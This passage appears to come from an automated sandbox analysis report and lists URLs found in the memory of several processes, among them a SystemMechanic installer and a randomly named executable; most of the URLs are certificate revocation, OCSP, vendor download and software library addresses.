0000000E.00000002.2960025325.00000173F53B0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2948318292.00000173F4AB0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2944001193.00000173F47A0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://compositewpf.codeplex.com/
Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.00000000061FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2948318292.00000173F4AB0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2944352752.00000173F47D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2942860915.00000173F4640000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2960025325.00000173F53B0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2948318292.00000173F4AB0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.00000000061FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2944352752.00000173F47D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2942860915.00000173F4640000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2960025325.00000173F53B0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2948318292.00000173F4AB0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2944352752.00000173F47D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2942860915.00000173F4640000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2960025325.00000173F53B0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2960025325.00000173F53B0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.00000000061FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2948318292.00000173F4AB0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
Source: run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
Source: run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.00000000061FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2944352752.00000173F47D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2942860915.00000173F4640000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2960025325.00000173F53B0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.00000000061FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2948318292.00000173F4AB0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
Source: run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
Source: run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.00000000061FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://dejavu.sourceforge.net
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://dejavu.sourceforge.net/wiki/index.php/License
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://dejavu.sourceforge.net/wiki/index.php/Licensehttp://dejavu.sourceforge.net/wiki/index.php/Lic
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://dejavu.sourceforge.nethttp://dejavu.sourceforge.netFonts
Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.0000000005E0E000.00000004.00000020.00020000.00000000.sdmp, u42w.3.exe, 00000005.00000000.1772107020.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://download.iolo.net
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://download.iolo.net/ds/4/en/images/dsUSB.imaRealDefense
Source: run.exe, run.exe, 00000002.00000000.1746274601.000000000083C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000002.00000002.1804456398.000000000083C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000F.00000000.1987893127.000000000083C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000F.00000002.2045446560.000000000083C000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://gdlp01.c-wss.com/rmds/ic/universalinstaller/common/checkconnection
Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.0000000005E0E000.00000004.00000020.00020000.00000000.sdmp, u42w.3.exe, 00000005.00000000.1772107020.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://google.com
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2948318292.00000173F4AB0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://james.newtonking.com/projects/json
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2944352752.00000173F47D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2942860915.00000173F4640000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2960025325.00000173F53B0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2948318292.00000173F4AB0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2944352752.00000173F47D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2942860915.00000173F4640000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2960025325.00000173F53B0000.00000004.08000000.00040000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2948318292.00000173F4AB0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2944352752.00000173F47D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2942860915.00000173F4640000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2960025325.00000173F53B0000.00000004.08000000.00040000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.00000000061FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0H
Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.00000000061FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0I
Source: run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0L
Source: run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2948318292.00000173F4AB0000.00000004.08000000.00040000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2948318292.00000173F4AB0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2944352752.00000173F47D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2942860915.00000173F4640000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2960025325.00000173F53B0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.00000000061FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s2.symcb.com0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380233000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcd.com0&
Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.0000000005E0E000.00000004.00000020.00020000.00000000.sdmp, u42w.3.exe, 00000005.00000003.2038133988.00000000025AB000.00000004.00001000.00020000.00000000.sdmp, u42w.3.exe, 00000005.00000000.1772107020.000000000041C000.00000020.00000001.01000000.0000000C.sdmp, u42w.3.exe, 00000005.00000003.2038133988.00000000025B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://svc.iolo.com/__svc/sbv/DownloadManager.ashx
Source: u42w.3.exe, 00000005.00000003.2038133988.0000000002674000.00000004.00001000.00020000.00000000.sdmp, u42w.3.exe, 00000005.00000003.2038133988.00000000025D6000.00000004.00001000.00020000.00000000.sdmp, u42w.3.exe, 00000005.00000003.2038133988.0000000002639000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://svc.iolo.com/__svc/sbv/DownloadManager.ashx.
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2959598733.00000173F5380000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://svc.iolo.com/__svc/sbv/Uninstall.ashx
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2944001193.00000173F47A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.codeplex.com/CompositeWPF
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2944352752.00000173F47D0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://www.codeplex.com/DotNetZip
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2944001193.00000173F47A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.codeplex.com/prism
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2944001193.00000173F47A0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://www.codeplex.com/prism#Microsoft.Practices.Prism.ViewModel
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2948318292.00000173F4AB0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2944352752.00000173F47D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2942860915.00000173F4640000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2960025325.00000173F53B0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.00000000061FA000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.0000000005E0E000.00000004.00000020.00020000.00000000.sdmp, u42w.3.exe, 00000005.00000000.1772107020.000000000041C000.00000020.00000001.01000000.0000000C.sdmp, u42w.3.exe, 00000005.00000003.2038133988.0000000002632000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.indyproject.org/
Source: run.exe, 00000002.00000002.1805902147.000000000398E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.00000000053DF000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003DF5000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.00000000053D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.info-zip.org/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.iolo.com/products/byepass/welcome/?utm_source=bp&utm_medium=product&p=d59cc353-e8e4-4f42-
